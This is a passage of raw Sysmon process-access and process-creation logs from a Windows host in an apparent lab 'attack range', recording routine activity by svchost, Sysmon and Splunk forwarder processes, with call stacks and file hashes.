15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7D9C-5FA1-7A01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.426{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D9C-5FA1-7A01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:12.428{D28789B6-7D9C-5FA1-7A01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.895{D28789B6-7D9D-5FA1-7B01-000000008801}50883004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D9D-5FA1-7B01-000000008801}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7D9D-5FA1-7B01-000000008801}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.770{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D9D-5FA1-7B01-000000008801}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:13.771{D28789B6-7D9D-5FA1-7B01-000000008801}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.677{D28789B6-7D9E-5FA1-7C01-000000008801}24723588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D9E-5FA1-7C01-000000008801}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:56:14.552{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 